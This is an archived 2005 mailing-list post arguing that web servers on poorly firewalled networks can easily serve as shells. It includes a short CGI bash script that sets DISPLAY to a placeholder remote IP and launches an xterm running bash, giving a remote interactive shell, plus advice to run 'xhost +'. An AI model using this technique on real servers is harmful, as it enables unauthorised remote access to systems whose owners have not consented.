Blackhole

Tobias Speckbacher TSpeckbacher at quova.com
Mon Apr 11 19:16:13 UTC 2005

Shell access is not necessary, the web server itself essentially can
serve as a shell.  Easy enough to write a cgi script to execute all the
commands necessary.

Hell, even getting a shell is trivial:

First we grab an xterm binary from a compatible system, and drop it
wherever we have access to, set permissions yada yada yada.  Unless of
course the admin was kind enough to install it for us, which I have seen
plenty of times.

We will name the following script xterm.cgi or whatever extensions you
have set to execute and drop it into my web sites cgi-bin directory.
Of course this will not work if the web server is properly firewalled,
which in my experience they hardly ever are.

#!/bin/bash

export DISPLAY=xxx.xxx.xxx.xxx:0.0
/tmp/xterm -e /bin/bash

If you try this don't forget to add the host to your X-Servers acl or
simply run xhost+.

A web server will let you just about do anything you want ...

-Tobias